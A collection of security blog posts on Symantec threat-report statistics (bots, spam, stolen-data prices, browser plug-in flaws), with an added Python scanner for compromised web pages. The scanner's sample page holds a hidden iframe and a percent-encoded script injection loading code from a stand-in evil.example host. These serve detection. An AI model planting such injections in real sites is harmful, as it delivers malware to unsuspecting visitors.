Malware – The News Arms Race?

This morning my colleague Tom Parsons from our Dublin Security Response team was quoted in a BBC article about the huge rise in malware in recent years, and the journalist speculated that the battle between cybercriminals and the security companies was akin to an arms race.

Certainly the number of new pieces of malware on the web these days is simply eye-watering. Symantec’s own Internet Security Threat Report recently reported that during 2008 Symantec created 1,656,227 new malicious code signatures. That’s a massive rise even on 2007, which was itself a big number!

If it is an arms race, the security companies are certainly pushing ahead with new technology to keep ahead of the threats and protect their customers. New approaches like whitelisting (approving the software that is allowed to run on your PC rather than trying to blacklist the bad stuff), heuristics and behavioural techniques are already making their way into today’s security software, and we’ll see a lot more of that in the years to come.

If it is a war, it’s one in which the security world is continually working to find new techniques and software to win. But it’s also essential that everyone else does their part too. The sad fact is that a lot of threats are spread by people not taking adequate steps to protect themselves. Just because you have insurance on your house, you can’t leave your front door open and expect a burglar to walk by. Make sure your software is up to date; that you receive the regular updates and patches; and don’t click on links in emails from people you don’t know.

1,900,000 Bots In A Network…

Some research has highlighted an enormous bot network of nearly 2 million machines. Couple that with the finding that one bot can create 600,000 spam messages a day and you have the potential for an enormous amount of junk to be zipping around the Internet. This number is greater than we saw in the latest Internet Security Threat Report (published earlier this month), where we saw a peak of just over 100,000 machines active on a single day, but with more than 4 million unique systems compromised in 2008. However, it is possible, and if the machines infected with Conficker/Downadup were ever turned into a bot network then that would be even bigger than this!

One of the things the research does highlight is the need to keep anti-malware definitions up to date; otherwise systems can become infected all too easily. How often should this happen? As often as the application allows. Switching it to update only once a week will put you at risk. Symantec issued 1.6 million new malware signatures last year; on average that’s more than 30,000 a week, so if you are not up to date then you are asking for trouble.

600,000 A Day…

In the latest Internet Security Threat Report, published earlier this month, we saw that bots increased 31% in 2008 (47% in EMEA). There is now a new report showing that a top-end system can crank out 600,000 spam emails a day once it has been turned into a bot!

How much does it cost to rent a bot? We have seen the price on the underground economy drop to a measly $0.04 per bot per day, and there were nearly 5 million unique bots observed in 2008, with an average of more than 70,000 active per day! Bots are now responsible for around 90% of spam.

What does a cyber-criminal want? Two things: firstly, information that they can use or sell to make money, and secondly, a fast machine with a good Internet connection. They need the latter to rent out for spam, phishing, denial-of-service attacks and scams. So keep your PC under lock and key (from a security perspective); otherwise you could be contributing to the spam problem as well as helping to line the cyber-criminals’ pockets.

60% Of Malware Created In 2008

Symantec’s latest Internet Security Threat Report came out this week and it showed that Symantec issued 1,656,227 new malicious code signatures in 2008. This is more than all the previous years put together!
This represents a tipping point: it is now easier to look at the good stuff than the bad. By following the trend and anticipating the changes, Symantec’s anti-malware products are now a mixture of technologies: blacklisting (the old way, spotting the bad stuff), whitelisting (lists of the good stuff), reputation-based (so that new ‘good stuff’ doesn’t get blocked) and behavioural (so that something previously unknown that is behaving badly can be stopped).

One of the other interesting statistics was the rise of bots. Globally bots are up 31%, with EMEA up 47%. Bots are responsible for around 90% of spam, so if your computer is infected then you are part of the problem!

Cyber-criminals are still after your confidential information, with credit card and bank account details topping the list. Prices on the underground economy have fallen this year, indicating that there is more information around and more people trying to sell it. Look after your information, and keep your system up to date with OS and application patches along with the latest virus definitions. All this can happen automatically, as long as you don’t turn the functionality off.

Credit Card Information… Going Cheap

Symantec’s latest Internet Security Threat Report has updated its figures on the cost of information on the underground economy. Topping the list again this year is credit card information, but the price is 40% less than last year! How much for your credit card details? A measly $0.06, or about 4p. Staggering, isn’t it? The quantity of information has also gone up, indicating that more people are falling for scams and exposing their credit card numbers, and in a typical supply-and-demand economy there are also more people selling the information. Phishing sites were up 66% on 2007, and the most popular topic was finance.

Email passwords were also on the list and moved up to #3, behind credit card and bank details. Why? There is a lot of information stored in email, including things like credit card details and bank information. Usernames and passwords in general are useful to the cyber-criminal: if it’s a home account, they might get access to one or two pieces of useful information, but if it is a work account they might be able to obtain complete customer details, new product details or sensitive financial information.

In tough economic times one of the goals for companies and individuals alike is to save money, and one of the best places to do that is on the Internet. There are a lot of genuine Internet bargains out there, but unfortunately there are a lot of scams as well. Just be a little extra vigilant and watch a little more closely for them; after all, a bargain that appears too good to be true probably is, and you could end up the victim of fraud.


Beware The Browser…

Symantec’s latest Internet Security Threat Report came out today, and one of the trends highlighted is attacks on the web browser. It’s not just the browser that has vulnerabilities; it is also the plug-ins. The average time to fix a problem in the browser is around a week, but some of the maximum times are around six months! However, at least there are fixes, and provided you have auto-update switched on, or check for new versions regularly, you should get them pretty quickly after they come out.

However, there were 424 vulnerabilities in browser plug-ins, and plug-ins are seldom updated automatically. The most common vulnerability class is memory corruption, which lets the cyber-criminal run arbitrary code and basically take over the machine or do whatever they like. Most of the threats target your confidential information. Social engineering attacks are also in the running; these ultimately result in the user inadvertently installing malware on their machine.

Many pieces of malware are now multi-functional, with many allowing remote access, exporting user data and logging keystrokes at the same time. What does this mean? If you happen to be doing a bit of online banking (or shopping), the cyber-criminal could end up with your bank or credit card details, and then you could become a victim of fraud or, worse still, identity theft.

New pieces of malware have been created which can become whatever is needed by downloading content or a payload from cyber-criminal web sites. So they can be spambots one day and run denial-of-service attacks the next. Conficker/Downadup is probably the most infamous of this type of malware, although it is unclear what its payload is going to be. Having your machine unknowingly host a spam service, or participate in a denial-of-service attack, is not good.

So if you are an organization, you need to look at your security and patching policy. Ensure that the latest security definitions are delivered to your users in a timely manner; this will keep you protected while you work on patching the OS and applications. You should also look at a policy for patching or regularly updating browser plug-ins as well.

If you are an individual, then you should also keep your security definitions up to date and ensure that OS and application updates are installed. So if a reminder appears on the screen that an update is available, install it now; don’t put it off. You may regret it later.

1 Server, 3 Weeks, 1.4GB Personal Information

A server was found this week chock full of personal information: 1.4GB of it. The information had been stolen from around the world and included health records and email, and within the email there was even more information relating to contacts, account details, pension savings plans (401k) and so on. 1.4GB can house a lot of useful information.

This server was quite a find, but it is not alone: we see compromised servers that receive stolen information every day, and there are a lot of them. OK, so most don’t hold 1.4GB, but they do contain tens of thousands of pieces of information. The latest Internet Security Threat Report (ISTR Vol. XIII, April 2008) reported more than 60,000 bot-infected computers per day (a 17% increase over the previous six months). These aren’t all collecting information; most are sending it out (spam, phishing, DoS, …), but some of them are. It also highlighted that of the 54,609 unique applications it observed being installed, 65% were malicious.

So (and I’m starting to sound like a broken record)… if you value your information and something asks to install itself, especially something offered through your web browser as a plug-in, be very sure that the source of the request is valid; if not, then just click away.

It’s Out Today…

Symantec released its Internet Security Threat Report (ISTR) today. This is volume XIII and as per usual there are some interesting numbers in there – you can download the report from symantec.com. The data is collected from the Global Intelligence Network which operates in 180 countries with more than 40,000 sensors and 2,000,000 managed dummy email accounts.

Some of the new metrics are:

  • Malicious attacks on ISPs. These target new subscribers who perhaps don’t have the security on their machines that they should.
  • Site-specific cross-site scripting. Well-known sites are targeted with invisible changes that download trojans onto unwary visitors’ machines. This is now the most common attack.
  • Malicious code which modifies web pages. This is on the increase, and is making it increasingly difficult for the visitor to distinguish a real site from a fake one.

While there is no silver bullet to prevent this from happening, the main watchword is caution. If a site is asking for more information than you are willing to give (do you really need to give your birthday or mother’s maiden name to any website?) then navigate away unless you are sure there is a genuine reason for them to have it. Social network sites are springing up and some are not all that they seem to be; just be wary. Also, make sure that you have a personal firewall, anti-virus and anti-phishing toolbar installed and up to date.
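The “invisible changes” listed above usually take one of two forms on a compromised site: an iframe sized to zero or styled invisible that pulls in a drive-by page, or an inline script whose real payload only appears after percent-decoding (a `document.write(unescape(...))` construct). The scanner below is an added example written for this page, not Symantec code or anything from the ISTR; the sample page, the `evil.example` host names and the hidden-iframe heuristics are all constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample page (not from the ISTR): a shop page into which an
# attacker has injected a zero-sized iframe and a percent-encoded script tag.
SAMPLE_HTML = """<html><body>
<h1>Welcome to our shop</h1>
<iframe src="https://maps.example.com/embed" width="400" height="300"></iframe>
<iframe src="http://evil.example/load.php" width="0" height="0" style="visibility:hidden"></iframe>
<script src="/js/cart.js"></script>
<script>document.write(unescape('%3Cscript src=%22http://evil.example/x.js%22%3E%3C/script%3E'));</script>
</body></html>"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# name="value", name='value' or bare name=value
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def parse_attrs(tag):
    """Map lower-cased attribute names to values for one start tag."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(tag)}


def is_hidden(attrs):
    """Heuristic (an assumption of this example): an iframe is 'invisible'
    if either dimension is 0 or 1 px, or its style hides it outright."""
    for dim in ("width", "height"):
        value = attrs.get(dim, "").rstrip("px")
        if value.isdigit() and int(value) <= 1:
            return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def hidden_iframes(html):
    """Return the src of every iframe the visitor would never see."""
    return [parse_attrs(tag).get("src", "")
            for tag in IFRAME_RE.findall(html) if is_hidden(parse_attrs(tag))]


def encoded_script_loads(html):
    """Return script URLs that only become visible after percent-decoding
    an inline script body, i.e. a <script> tag smuggled in via unescape()."""
    hits = []
    for body in SCRIPT_RE.findall(html):
        decoded = unquote(body)
        if "<script" not in body.lower() and "<script" in decoded.lower():
            hits.extend(SRC_RE.findall(decoded))
    return hits


if __name__ == "__main__":
    print("hidden iframes:", hidden_iframes(SAMPLE_HTML))
    print("encoded script loads:", encoded_script_loads(SAMPLE_HTML))
```

Run against the sample it reports the `load.php` iframe and the `x.js` script while leaving the legitimate map embed and `cart.js` alone. Regex-based checks like these are a triage aid for a site owner comparing a page against a known-good copy, not a replacement for proper HTML parsing or for the reputation and behavioural layers the report describes.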

I will post some more articles over the next week – highlighting some of the other interesting data points that the report has shown up.

In the meantime hear my views on a podcast: http://www.bitebroadcast.com/symantec/istr08_01/

What Price Information?

In the latest release of the Symantec Internet Security Threat Report we have an update on the price of information. Perhaps one of the most scary aspects is that you can now get volume discounts!

Top of the list are bank account and credit card details, which range from 20p to £500. Next are full identities, which come in at between 50p and £7.50; while these do not give instant access to money, they do enable cyber-criminals to apply for bank accounts and credit cards in the victim’s name and then perpetrate the fraud without the victim knowing, until they find they have lost their credit rating due to bad debts.

Also making it into the top 5, for the first time, are eBay accounts, which go for between 50p and £4. This shows that all information is worth money to someone (further down the list are gaming accounts, social network accounts and others). So if you have information that you think is valuable to you, it is probably of value to someone else too: protect it wisely.